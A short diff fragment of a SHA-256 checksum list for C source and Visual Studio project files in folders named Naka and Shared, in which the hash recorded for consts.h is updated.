+e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5 *Source\Naka\main.c 4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462 *Source\Naka\naka.h 2e13d6847d5f730e7fcbb4a720614448cb364fc8df5dc0ed1694a63cc355b2e3 *Source\Naka\Naka.vcxproj 175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f *Source\Naka\Naka.vcxproj.filters e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h -70302e7507ec5beb4959b70a4d91ac4a40b09f2be3e4025ffe166cf824e77857 *Source\Shared\consts.h +fc2b0b243e1d7bf63e3f81fbd94d8bc578b7ad0b9fe69843a8e0168b2f57a9a4 *Source\Shared\consts.h 01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h 133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4 *Source\Shared\libinc.h